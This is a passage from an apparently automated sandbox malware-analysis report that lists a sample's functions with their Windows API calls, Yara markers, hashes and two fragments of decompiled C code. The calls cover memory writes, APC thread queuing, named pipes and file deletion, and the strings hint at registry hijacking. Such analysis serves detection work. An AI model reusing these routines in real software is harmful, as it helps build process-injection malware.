                                                                                                                                        • Instruction Fuzzy Hash: 67316B76A00205EFDB10DFA5CD80A6EB7F9FB84305F12443AE905D7261EB74ED488B29
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00448DAA, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105stringnativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 00448DF9
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00448E07
                                                                                                                                        • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 00448E32
                                                                                                                                        • lstrcpyW.KERNEL32(00000006,00000000), ref: 00448E5F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Query$lstrcpylstrlen
                                                                                                                                        • String ID: DelegateExecute$RgF$SOFTWARE\Classes\Chrome
                                                                                                                                        • API String ID: 3961825720-32970696
                                                                                                                                        • Opcode ID: 0001b780fc6a8037e279b713538c0205caf1a7341a76b30aa5d1c91061f43077
                                                                                                                                        • Instruction ID: 6c559df32d1756b4891e1c0dd5e70a2b06d5743739566b8cee95b50a952d9247
                                                                                                                                        • Opcode Fuzzy Hash: 0001b780fc6a8037e279b713538c0205caf1a7341a76b30aa5d1c91061f43077
                                                                                                                                        • Instruction Fuzzy Hash: B7313B71A00209FFEF119F95CD84A9EBBB8FF14314F20802EF905E2260DBB99A11DB55
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00443DEE, Relevance: 10.6, APIs: 7, Instructions: 109filestringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00443E06
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • FindFirstFileW.KERNEL32(?,00000000,?,00000250,?,0000000A,00000208), ref: 00443E6F
                                                                                                                                        • lstrlenW.KERNEL32(00000250,?,00000250,?,0000000A,00000208), ref: 00443E97
                                                                                                                                        • RemoveDirectoryW.KERNEL32(?,?,00000250,?,0000000A,00000208), ref: 00443EE9
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,00000250,?,0000000A,00000208), ref: 00443EF4
                                                                                                                                        • FindNextFileW.KERNEL32(?,00000000,?,00000250,?,0000000A,00000208), ref: 00443F07
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 499515686-0
                                                                                                                                        • Opcode ID: 0ec81fbb9c3e6775e41184a5e41094bb43967243e60fb2e87ceb4414563a4f80
                                                                                                                                        • Instruction ID: 67dc8bfc2cba0ce5002983e497b4643422e7169bb9cf7de5322f7452eb8dc5e2
                                                                                                                                        • Opcode Fuzzy Hash: 0ec81fbb9c3e6775e41184a5e41094bb43967243e60fb2e87ceb4414563a4f80
                                                                                                                                        • Instruction Fuzzy Hash: A7412C71C00209EBEF10EFA5DC45AAE7BB8FF00706F20456AF901A6161DB799F48DB59
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045735C, Relevance: 9.1, APIs: 6, Instructions: 64libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
                                                                                                                                        • LoadLibraryA.KERNEL32(6676736D,00000000,?,00000014,?,0044353A), ref: 0045737C
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,704F4349), ref: 0045739B
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,6C434349), ref: 004573B0
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,6E494349), ref: 004573C6
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,65474349), ref: 004573DC
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,65534349), ref: 004573F2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$AllocateHeapLibraryLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2486251641-0
                                                                                                                                        • Opcode ID: 9b06f39e45a3160de418a8c177c4bf0312a95cec84ac0b6e631dbd3a15de494f
                                                                                                                                        • Instruction ID: e12f6bb24ffbaecb29b4a1025689176a94ed0d86c0cfbd290e04746f2d53e84e
                                                                                                                                        • Opcode Fuzzy Hash: 9b06f39e45a3160de418a8c177c4bf0312a95cec84ac0b6e631dbd3a15de494f
                                                                                                                                        • Instruction Fuzzy Hash: EF114FF12057169EE720DBBAEC84D6733ECEB047503050576ED49C7212EA78EC4ACB68
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00457511, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memset.NTDLL ref: 00457533
                                                                                                                                          • Part of subcall function 00461813: NtAllocateVirtualMemory.NTDLL([uE,00000000,00000000,[uE,00003000,00000040,?,?,?,0045755B), ref: 00461844
                                                                                                                                          • Part of subcall function 00461813: RtlNtStatusToDosError.NTDLL(00000000), ref: 0046184B
                                                                                                                                          • Part of subcall function 00461813: SetLastError.KERNEL32(00000000,?,?,?,0045755B), ref: 00461852
                                                                                                                                        • GetLastError.KERNEL32(?,00000318,00000008), ref: 00457643
                                                                                                                                          • Part of subcall function 0045AAB7: RtlNtStatusToDosError.NTDLL(00000000), ref: 0045AACF
                                                                                                                                        • memcpy.NTDLL(00000218,00466BB0,00000100,00000000,00010003,?,?,00000318,00000008), ref: 004575C2
                                                                                                                                        • RtlNtStatusToDosError.NTDLL(00000000), ref: 0045761C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2966525677-3916222277
                                                                                                                                        • Opcode ID: d15f6e3b4352795a2d95e5757cc0781a9f4ff61ec968c210c112257d5d7a351f
                                                                                                                                        • Instruction ID: c1cd5eed49c67a02e61fe315d506c7df30c43def4f7e6ed7548f908180fd8744
                                                                                                                                        • Opcode Fuzzy Hash: d15f6e3b4352795a2d95e5757cc0781a9f4ff61ec968c210c112257d5d7a351f
                                                                                                                                        • Instruction Fuzzy Hash: F531CE71900709AFDB20CF65D984AAAB7F8EB04315F10457FE906D3242EB78EE49CB59
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045F9C9, Relevance: 7.9, APIs: 6, Instructions: 399COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset$memcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 368790112-0
                                                                                                                                        • Opcode ID: 054b374b825756423f62ad41e37b224ef3ec10b8d4154d6d3fe35c161315b27e
                                                                                                                                        • Instruction ID: d4d0d3276f4cb4c19e3f96d8828c63608c7846644c13acafaa3c2c3e04acd3ab
                                                                                                                                        • Opcode Fuzzy Hash: 054b374b825756423f62ad41e37b224ef3ec10b8d4154d6d3fe35c161315b27e
                                                                                                                                        • Instruction Fuzzy Hash: FEF1F230500B89CFCB31CF69C5946AAB7F4BF52305F14497EC9D786682D239AA4DCB1A
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0044190E, Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,0046E0F8,0046E08C), ref: 00441932
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0045DB81), ref: 0044197D
                                                                                                                                          • Part of subcall function 0044E398: CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,0044403C), ref: 0044E3AF
                                                                                                                                          • Part of subcall function 0044E398: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 0044E3C4
                                                                                                                                          • Part of subcall function 0044E398: GetLastError.KERNEL32(00000000), ref: 0044E3CF
                                                                                                                                          • Part of subcall function 0044E398: TerminateThread.KERNEL32(00000000,00000000), ref: 0044E3D9
                                                                                                                                          • Part of subcall function 0044E398: CloseHandle.KERNEL32(00000000), ref: 0044E3E0
                                                                                                                                          • Part of subcall function 0044E398: SetLastError.KERNEL32(00000000), ref: 0044E3E9
                                                                                                                                        • GetLastError.KERNEL32(Function_00004965,00000000,00000000), ref: 00441965
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00441975
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1700061692-0
                                                                                                                                        • Opcode ID: e145d1f779a64ab0e3142dd73626b454fc6bbde11d1e29608d5f5f0d8b962e5d
                                                                                                                                        • Instruction ID: 89820a3b110e3d80935c849210a48228e5b25bde92283f44800986a48597349f
                                                                                                                                        • Opcode Fuzzy Hash: e145d1f779a64ab0e3142dd73626b454fc6bbde11d1e29608d5f5f0d8b962e5d
                                                                                                                                        • Instruction Fuzzy Hash: 8DF0A9B0305311AFF3545B699C88F6B779CEB86374B15063AF621C62E0DAA44C0AC57E
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 73751371, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E73751371() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x73754130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x7375413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x7375412c = _t3;
					_t5 = GetCurrentProcessId();
					 *0x73754128 = _t5;
					 *0x73754130 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x73754124 = _t6;
					if(_t6 == 0) {
						 *0x73754124 =  *0x73754124 | 0xffffffff;
					}
					return 0;
				}
			}









                                                                                                                                        0x73751372
                                                                                                                                        0x73751380
                                                                                                                                        0x73751388
                                                                                                                                        0x7375138d
                                                                                                                                        0x737513d7
                                                                                                                                        0x737513d7
                                                                                                                                        0x7375138f
                                                                                                                                        0x73751397
                                                                                                                                        0x737513d3
                                                                                                                                        0x737513d5
                                                                                                                                        0x73751399
                                                                                                                                        0x73751399
                                                                                                                                        0x7375139e
                                                                                                                                        0x737513ac
                                                                                                                                        0x737513b1
                                                                                                                                        0x737513b7
                                                                                                                                        0x737513bf
                                                                                                                                        0x737513c4
                                                                                                                                        0x737513c6
                                                                                                                                        0x737513c6
                                                                                                                                        0x737513d0
                                                                                                                                        0x737513d0

                                                                                                                                        APIs
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,73751DA3), ref: 73751380
                                                                                                                                        • GetVersion.KERNEL32(?,73751DA3), ref: 7375138F
                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,73751DA3), ref: 7375139E
                                                                                                                                        • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,73751DA3), ref: 737513B7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.427793993.0000000073750000.00000040.00000001.sdmp, Offset: 73750000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.427811175.0000000073755000.00000040.00000001.sdmp Download File
                                                                                                                                        • Associated: 00000000.00000002.427822852.0000000073757000.00000040.00000001.sdmp Download File
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 845504543-0
                                                                                                                                        • Opcode ID: 841238d0568f05a7303952ea6792e7e78989aaef8d3e18e1cc0d407198daccce
                                                                                                                                        • Instruction ID: 92f0f740639abccf15f5724973b4f48b491c2afb53b979e243400713b839e093
                                                                                                                                        • Opcode Fuzzy Hash: 841238d0568f05a7303952ea6792e7e78989aaef8d3e18e1cc0d407198daccce
                                                                                                                                        • Instruction Fuzzy Hash: EFF06D73644326DBFB48BF6BAC0A7447BA5F718722F30001AF18EC61D0D3B940408B48
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00465A8E, Relevance: 4.5, APIs: 3, Instructions: 45nativethreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 00465AA2
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 00465AE2
                                                                                                                                          • Part of subcall function 00453A77: NtWriteVirtualMemory.NTDLL(00000318,00000000,00000000,?,004575FD,00000000,?,004575FD,?,00000000,00000000,00000318,00000020,00000000,00010003,?), ref: 00453A95
                                                                                                                                        • RtlNtStatusToDosError.NTDLL(00000000), ref: 00465AEB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Error$InformationLastMemoryQueryStatusThreadVirtualWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4036914670-0
                                                                                                                                        • Opcode ID: 2c8c530381bb892093febc183879cd25ca3de93a768ed6edc89fec57da4d328b
                                                                                                                                        • Instruction ID: 88f056138e20c572742e7949bb47742588361cdc74516e7c5a79cec281562ec4
                                                                                                                                        • Opcode Fuzzy Hash: 2c8c530381bb892093febc183879cd25ca3de93a768ed6edc89fec57da4d328b
                                                                                                                                        • Instruction Fuzzy Hash: 6D012875900508FFEF11AB91DD45DAEBBBDFB84700F10052AF941E2150EBA5D9049B66
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00447CF0, Relevance: 3.1, Strings: 2, Instructions: 583COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $8RF
                                                                                                                                        • API String ID: 0-368676651
                                                                                                                                        • Opcode ID: 8c3066997f3812fd9602f480da161331cbe6e63b15e41cc79c63d9b7b6982fcc
                                                                                                                                        • Instruction ID: f3ca9e32dfdc9fbdf9343432409eb16169fb1a0c5309ce37333644083ddc0fdb
                                                                                                                                        • Opcode Fuzzy Hash: 8c3066997f3812fd9602f480da161331cbe6e63b15e41cc79c63d9b7b6982fcc
                                                                                                                                        • Instruction Fuzzy Hash: E3428C70A04B458FDB29CF69C4906BEB7F1FF59304F14896EC48697752DB38A886CB18
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00446F11, Relevance: 3.0, APIs: 2, Instructions: 48nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 00446F42
                                                                                                                                        • RtlNtStatusToDosError.NTDLL(C000009A), ref: 00446F79
                                                                                                                                          • Part of subcall function 0044EB0A: RtlFreeHeap.NTDLL(00000000,00000000,00456D9D,00000000), ref: 0044EB16
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFreeHeapInformationQueryStatusSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2533303245-0
                                                                                                                                        • Opcode ID: 2afbc6f39676b9eae65bf4fa929052e75e79188587fa3f5a9272b6dff1626132
                                                                                                                                        • Instruction ID: d56180873e54a8b0df5e9642df864a64b0fc0bc203a3bc86920bfa5fdf93337e
                                                                                                                                        • Opcode Fuzzy Hash: 2afbc6f39676b9eae65bf4fa929052e75e79188587fa3f5a9272b6dff1626132
                                                                                                                                        • Instruction Fuzzy Hash: DA012B33802120BBE7215B519C04AAFBA69EF47B52F13012BFD8563200DB388D0896EE
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00450084, Relevance: 3.0, APIs: 2, Instructions: 37nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memset.NTDLL ref: 004500A3
                                                                                                                                        • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 004500BB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InformationProcessQuerymemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2040988606-0
                                                                                                                                        • Opcode ID: 386b0d0cbe034a42136669f89b1fc656de37d1e422e927811be439ac10b5e6a7
                                                                                                                                        • Instruction ID: 14fc9d11985b1b4295263b8b1abfd2456d73b229ede7d64cff2a77a35d6a09e7
                                                                                                                                        • Opcode Fuzzy Hash: 386b0d0cbe034a42136669f89b1fc656de37d1e422e927811be439ac10b5e6a7
                                                                                                                                        • Instruction Fuzzy Hash: 1DF0447690022C6AEB10DA91DC05FDE7B7CEB14740F0080A5FE04E2181E774DA45CBA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 00442D26, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RtlNtStatusToDosError.NTDLL(C0000002), ref: 00442D53
                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00458477,?,?,?,00000004,?,00000000,0046E088,?,00000000), ref: 00442D5A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Error$LastStatus
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4076355890-0
                                                                                                                                        • Opcode ID: 1d213c02c091450cc80465fae341b0fd4890600d05d7b8cd6f85e3db92a0ee59
                                                                                                                                        • Instruction ID: da83806fe12231eaa15b8ceaaefc456cbbba120b9641281198f9fabdcf1d95cb
                                                                                                                                        • Opcode Fuzzy Hash: 1d213c02c091450cc80465fae341b0fd4890600d05d7b8cd6f85e3db92a0ee59
                                                                                                                                        • Instruction Fuzzy Hash: A2E04F72A0021ABBDF115FE4DD08D9B7BADFB08741B404025FE01C2131DBB5C861ABE5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004491D8, Relevance: 2.9, APIs: 2, Instructions: 416COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memset.NTDLL ref: 004495B0
                                                                                                                                        • memset.NTDLL ref: 004495BF
                                                                                                                                          • Part of subcall function 0045D5A3: memset.NTDLL ref: 0045D5B4
                                                                                                                                          • Part of subcall function 0045D5A3: memset.NTDLL ref: 0045D5C0
                                                                                                                                          • Part of subcall function 0045D5A3: memset.NTDLL ref: 0045D5EB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2221118986-0
                                                                                                                                        • Opcode ID: 384b149705da2cf4cd3d4b80baa90d7ed373540311f1b3196bf74c1f5a83336c
                                                                                                                                        • Instruction ID: 2a22481785639622ceab140a91854384565e9032e55e3fa3e7472f64970a2301
                                                                                                                                        • Opcode Fuzzy Hash: 384b149705da2cf4cd3d4b80baa90d7ed373540311f1b3196bf74c1f5a83336c
                                                                                                                                        • Instruction Fuzzy Hash: 4F022071501B218FEB79CF29C680527B7F1BF567147604E2ED6E786A90E239F881DB08
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 004562B9, Relevance: 1.9, APIs: 1, Instructions: 610COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2221118986-0
                                                                                                                                        • Opcode ID: 2b2498c541d4775188133c0a7959ecd8b364d41e93bf25284642e790f5a903b2
                                                                                                                                        • Instruction ID: 3a73e53f5bcc4035c47b35a964ca3fd9620bc248780cf475281b15197fc3a2ce
                                                                                                                                        • Opcode Fuzzy Hash: 2b2498c541d4775188133c0a7959ecd8b364d41e93bf25284642e790f5a903b2
                                                                                                                                        • Instruction Fuzzy Hash: 2822837BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 0045BDD5, Relevance: 1.8, APIs: 1, Instructions: 556COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • memcpy.NTDLL(?,00000001,00000000,000000FE,?,00000000,00000000), ref: 0045C193
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3510742995-0
                                                                                                                                        • Opcode ID: e10c0db2a11589fb2f19a5f7fdd216aae94fb1245db8aacb142af03284e49702
                                                                                                                                        • Instruction ID: 2b8711e2fa8fcbd5f20f6775718457011f966b8fffb7c26e742fd6af5cfe0e14
                                                                                                                                        • Opcode Fuzzy Hash: e10c0db2a11589fb2f19a5f7fdd216aae94fb1245db8aacb142af03284e49702
                                                                                                                                        • Instruction Fuzzy Hash: 3E322571A00704DFDB15CF98C4806AEBBB1FF55312F2481AADC15AB286D7789A49CB84
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 737524C5, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E737524C5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x73754178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x737541c0 = 1;
										__eflags =  *0x737541c0;
										if( *0x737541c0 != 0) {
											goto L60;
										}
										_t84 =  *0x73754178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x737541c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x73754178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x73754180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x7375417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x73754180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x73754180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x737541c0 = 1;
